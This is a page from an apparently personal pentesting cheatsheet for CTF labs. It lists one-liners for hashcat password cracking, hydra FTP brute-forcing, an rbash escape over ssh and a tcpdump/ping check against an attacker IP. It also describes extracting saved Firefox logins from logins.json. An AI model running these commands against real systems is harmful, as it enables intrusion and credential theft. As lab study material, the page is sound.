✒️
Pentesting Cheatsheet
  • Introduction
  • Basics
  • Information Gathering | OSINT
  • Penetration Testing
    • Scanning and Enumeration
    • HTTP and HTTPS
    • SMB | Windows Domain Enumeration
    • NFS
    • SMTP
    • Reverse Shells
    • Buffer Overflow | Buf Exploitation
    • Linux Privilege Escalation
    • Miscellaneous
    • Redis
  • Active Directory
    • AD Extras
    • Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
  • Pivoting
  • Windows Privesc
    • Window Tools/Resources
    • Meterpreter Privesc
    • Powershell Scripting
  • Vulnhub/ PG/ THM/ HTB
  • Apache Log4j
  • Linux Forensics Cheatsheet
Powered by GitBook
On this page
  • TCPDUMP LISTENER
  • Python Library Hijacking
  • Exploiting Wildcard

Was this helpful?

  1. Penetration Testing

Miscellaneous

PreviousLinux Privilege EscalationNextRedis

Last updated 2 years ago

Was this helpful?

hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force

scp important.txt ubuntu@192.168.1.30:/home/ubuntu/transferred.txt

wget -m ftp://ftpuser:givemefiles777@10.10.94.48

python -m pyftpdlib 21 hydra -e nsr -l elly ftp://192.168.249.148

Turn passwd file into userlist to use in bruteforce: cut -d ":" -f 1 passwd > userlist

TCPDUMP LISTENER

Start a tcpdump listener on your local machine.

If using your own machine with the VPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the Ethernet, use:

  • sudo tcpdump ip proto \\icmp -i eth0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

ping <ATTACKER IP> -c 4

If we know the ssh credentials of the user who is part of rbash shell, then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

ssh seppuku@192.168.53.90 -t "bash --noprofile"

Python Library Hijacking

Exploiting Wildcard

Mozilla History Decrypt

.mozilla directory, which holds firefox’s history of it’s user can be used to get credentials. logins.json holds the encrypted login credentials.

Website:   https://tryhackme.com
Username: 'chris_w@vulnnet.thm'
Password: '{Redacted}'

LogoLinux Privilege Escalation: Python Library Hijacking - Hacking ArticlesHacking Articles
LogoExploiting Wildcard for Privilege Escalation - Hacking ArticlesHacking Articles
LogoGitHub - PinkDraconian/CTF-bash-tools: Toolset for automating common management actions used in CTF'sGitHub
LogoGitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub